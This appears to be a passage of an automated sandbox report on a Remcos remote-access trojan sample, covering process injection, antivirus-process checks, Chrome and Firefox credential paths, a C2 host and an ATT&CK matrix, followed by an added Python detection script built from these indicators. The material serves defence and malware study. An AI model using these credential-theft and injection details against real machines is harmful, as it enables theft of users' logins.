                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C67E879 FindFirstFileExA,8_2_1C67E879
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C63783C FindFirstFileW,FindNextFileW,8_2_1C63783C
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C63880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_1C63880C
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C649AF5 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_1C649AF5
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C63BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_1C63BB30
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C639665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_1C639665
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C639253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_1C639253
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C64C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_1C64C291
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C63C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_1C63C34D
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_04667C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_04667C97
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWYV
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.000000000078A000.00000004.00000020.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.0000000000475000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.0000000000475000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: Ocihlomc.PIF, 00000007.00000002.2150286434.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Ocihlomc.PIF, 0000000A.00000002.2210707182.0000000000991000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exe API call chain: ExitProcess graph end node graph_0-33904
                  Source: C:\Windows\SysWOW64\colorcpl.exe API call chain: ExitProcess graph end node graph_5-98501
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exe Process information queried: ProcessInformation
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_046949F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_046949F9
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exe Code function: 0_2_028B7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_028B7AC0
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_046A32B5 mov eax, dword ptr fs:[00000030h]5_2_046A32B5
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_066E1179 mov eax, dword ptr fs:[00000030h]5_2_066E1179
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_06723FC1 mov eax, dword ptr fs:[00000030h]5_2_06723FC1
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04831179 mov eax, dword ptr fs:[00000030h]8_2_04831179
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_04873FC1 mov eax, dword ptr fs:[00000030h]8_2_04873FC1
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C6732B5 mov eax, dword ptr fs:[00000030h]8_2_1C6732B5
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_04672077 GetProcessHeap,HeapFree,5_2_04672077
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_04694FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_04694FDC
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_046949F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_046949F9
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_04694B47 SetUnhandledExceptionFilter,5_2_04694B47
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_0469BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0469BB22
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C664FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_1C664FDC
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C6649F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_1C6649F9
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C664B47 SetUnhandledExceptionFilter,8_2_1C664B47
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C66BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_1C66BB22

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 66E0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 4830000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 66E15CFJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFThread created: C:\Windows\SysWOW64\SndVol.exe EIP: 48315CFJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 66E0000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFMemory written: C:\Windows\SysWOW64\SndVol.exe base: 4830000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 66E0000Jump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFMemory written: C:\Windows\SysWOW64\SndVol.exe base: 4830000Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe5_2_046720F7
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe8_2_1C6420F7
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04679627 mouse_event,5_2_04679627
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: colorcpl.exe, 00000005.00000002.4443196477.000000000045F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerAI\184f
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ6
                  Source: colorcpl.exe, 00000005.00000002.4443196477.000000000045F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerAI\
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerm6
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager96ca
                  Source: colorcpl.exe, 00000005.00000002.4443196477.000000000045F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerAI\26
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000448000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerlc6
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.drBinary or memory string: [Program Manager]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04694C52 cpuid 5_2_04694C52
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_028BD5D0
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_028A5A90
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_028C5FA0
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: GetLocaleInfoA,0_2_028AA780
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: GetLocaleInfoA,0_2_028AA7CC
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_028A5B9C
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_028BD5D0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_046B243C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,5_2_046A8404
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,5_2_046B2543
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_046B2610
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,5_2_046B2036
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_046B20C3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,5_2_046B2313
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_046B1CD8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,5_2_046B1F50
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,5_2_046B1F9B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,5_2_046A88ED
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoA,5_2_0466F8D1
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_1C681CD8
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,8_2_1C681F50
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,8_2_1C681F9B
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,8_2_1C6788ED
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoA,8_2_1C63F8D1
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_1C68243C
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,8_2_1C678404
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,8_2_1C682543
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_1C682610
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,8_2_1C682036
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_1C6820C3
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,8_2_1C682313
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028A91C8 GetLocalTime,0_2_028A91C8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0467B60D GetUserNameW,5_2_0467B60D
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_046A9190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,5_2_046A9190
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028AB748 GetVersionExA,0_2_028AB748
Source: XY2I8rWLkM.exe, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2038640740.0000000014E1D000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr | Binary or memory strings (one finding each, same source list for all eight): cmdagent.exe, quhlpsvc.exe, avgamsvr.exe, TMBMSRV.exe, Vsserv.exe, avgupsvc.exe, avgemc.exe, MsMpEng.exe

                  Stealing of Sensitive Information

Source: Yara match | File source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2153175404.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\ffrrdds\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data, 5_2_0466BA12
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data, 8_2_1C63BA12
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\, 5_2_0466BB30
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \key3.db, 5_2_0466BB30
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\, 8_2_1C63BB30
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \key3.db, 8_2_1C63BB30

                  Remote Access Functionality

Source: C:\Windows\SysWOW64\colorcpl.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TALGAI
Source: C:\Windows\SysWOW64\SndVol.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TALGAI
Source: Yara match | File source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2153175404.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\ffrrdds\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: cmd.exe, 5_2_0466569A
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: cmd.exe, 8_2_1C63569A
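The indicators in the two sections above (the Rmc-TALGAI mutex, the logs.dat keylog file under C:\ProgramData\ffrrdds, the Chrome and Firefox credential-store paths referenced from the injected colorcpl.exe and SndVol.exe, the .PIF dropped into C:\Users\Public\Libraries, and the jantis.duckdns.org C2 listed in the behavior graph and domain table) can be turned directly into host detection logic. The following Python is an added example written for this page, not part of the Joe Sandbox report or its tooling; the key=value log format, the event names (ProcessCreate, FileCreate, NetworkConnect, MutexCreate, FileRead) and the sample lines are constructed assumptions modelled on Sysmon-style telemetry.

```python
"""Offline matcher for the Remcos / DBatLoader host indicators listed in this report.

Added example, not part of the Joe Sandbox report or its tooling. The key=value
log format, the event names and the sample lines below are constructed
assumptions modelled on Sysmon-style telemetry.
"""
import re
from dataclasses import dataclass

# Indicators taken from the report (mutex, keylog file, drop directory, C2).
C2_HOST = "jantis.duckdns.org"
C2_IP = "103.186.117.171"
C2_PORT = "1188"
MUTEX = "Rmc-TALGAI"
KEYLOG_FILE = "c:\\programdata\\ffrrdds\\logs.dat"
DROP_DIR = "c:\\users\\public\\libraries\\"
PE_EXTS = (".exe", ".dll", ".pif")
# System binaries the loader injected its payload into. Neither has a
# legitimate reason to open network sockets or read browser credential stores.
INJECTED_HOSTS = {"colorcpl.exe", "sndvol.exe"}
# Credential-store paths referenced by the injected code (Chrome Login Data,
# Firefox profile directory and key3.db).
CRED_STORE_MARKERS = (
    "\\google\\chrome\\user data\\default\\login data",
    "\\mozilla\\firefox\\profiles\\",
    "key3.db",
)

_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> dict:
    """Parse one key=value line; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in _KV.findall(line)}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def match_event(ev: dict) -> list:
    """Return the names of the indicator rules that fire on one event."""
    hits = []
    kind = ev.get("Event", "")
    image = _basename(ev.get("Image", ""))
    target = ev.get("TargetFilename", "").lower()

    if kind == "ProcessCreate":
        parent = ev.get("ParentImage", "").lower()
        # A system binary launched from a user-writable path (here the Desktop
        # sample and the dropped .PIF) rather than by explorer or services.
        if image in INJECTED_HOSTS and parent.startswith("c:\\users\\"):
            hits.append("system_binary_spawned_from_user_dir")
    elif kind == "FileCreate":
        if target == KEYLOG_FILE:
            hits.append("remcos_keylog_file")
        if target.startswith(DROP_DIR) and target.endswith(PE_EXTS):
            hits.append("pe_dropped_in_public_libraries")
    elif kind == "NetworkConnect":
        host = ev.get("DestinationHostname", "").lower()
        if host == C2_HOST or ev.get("DestinationIp") == C2_IP or (
            ev.get("DestinationPort") == C2_PORT and image in INJECTED_HOSTS
        ):
            hits.append("remcos_c2")
        # Any outbound socket from the injected host binaries is suspicious,
        # including the geoplugin.net lookup Remcos performs after check-in.
        if image in INJECTED_HOSTS:
            hits.append("injected_system_binary_network")
    elif kind == "MutexCreate":
        # EDR/sandbox-style event; Sysmon itself does not record mutexes.
        if ev.get("Name", "").endswith("\\" + MUTEX):
            hits.append("remcos_mutex")
    elif kind == "FileRead":
        if image in INJECTED_HOSTS and any(m in target for m in CRED_STORE_MARKERS):
            hits.append("browser_credential_store_access")
    return hits


@dataclass
class Finding:
    rule: str
    line: str


def scan(lines) -> list:
    """Run every rule over every line and collect the hits in log order."""
    return [Finding(rule, line) for line in lines for rule in match_event(parse_event(line))]


# Constructed sample telemetry modelled on the report's process tree; not real logs.
SAMPLE_LOG = [
    r'Event=ProcessCreate Image="C:\Windows\SysWOW64\colorcpl.exe" ParentImage="C:\Users\user\Desktop\XY2I8rWLkM.exe"',
    r'Event=FileCreate Image="C:\Windows\SysWOW64\extrac32.exe" TargetFilename="C:\Users\Public\Libraries\Ocihlomc.PIF"',
    r'Event=NetworkConnect Image="C:\Windows\SysWOW64\colorcpl.exe" DestinationHostname=jantis.duckdns.org DestinationIp=103.186.117.171 DestinationPort=1188',
    r'Event=NetworkConnect Image="C:\Windows\SysWOW64\colorcpl.exe" DestinationHostname=geoplugin.net DestinationIp=178.237.33.50 DestinationPort=80',
    r'Event=FileCreate Image="C:\Windows\SysWOW64\colorcpl.exe" TargetFilename="C:\ProgramData\ffrrdds\logs.dat"',
    r'Event=MutexCreate Image="C:\Windows\SysWOW64\SndVol.exe" Name="\Sessions\1\BaseNamedObjects\Rmc-TALGAI"',
    r'Event=FileRead Image="C:\Windows\SysWOW64\SndVol.exe" TargetFilename="C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"',
    # Benign activity that must not fire.
    r'Event=NetworkConnect Image="C:\Program Files\Google\Chrome\Application\chrome.exe" DestinationHostname=www.example.com DestinationIp=93.184.216.34 DestinationPort=443',
    r'Event=FileCreate Image="C:\Windows\explorer.exe" TargetFilename="C:\Users\Public\Libraries\notes.txt"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding.rule:38s} {finding.line}")
```

Run it directly to print the eight hits for the constructed log. Only two of the rules (a system binary spawned from a path under C:\Users, and colorcpl.exe or SndVol.exe opening a network socket at all) survive a rebuild of the sample with a different mutex, C2 host or drop directory; the string-matching rules are there to confirm this exact sample and should be expected to rot.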
MITRE ATT&CK matrix, listed per tactic column. A number in parentheses is the count of matching signatures for that technique; entries without a number are unmatched matrix placeholders. A multi-digit run such as 412 is most likely several adjacent per-cell counters run together by extraction rather than a single number.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Native API (1); Command and Scripting Interpreter (1); Service Execution (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: Scripting (1); DLL Side-Loading (1); Valid Accounts (1); Windows Service (1); Registry Run Keys / Startup Folder (1); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Valid Accounts (1); Access Token Manipulation (11); Windows Service (1); Process Injection (412); Registry Run Keys / Startup Folder (1); Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (11); Valid Accounts (1); Virtualization/Sandbox Evasion (1); Access Token Manipulation (11); Process Injection (412); Dynamic API Resolution; Stripped Payloads
Credential Access: OS Credential Dumping (1); Input Capture (111); Credentials In Files (2); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); System Network Connections Discovery (1); File and Directory Discovery (2); System Information Discovery (34); Security Software Discovery (131); Virtualization/Sandbox Evasion (1); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (11); Input Capture (111); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (21); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (213); Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
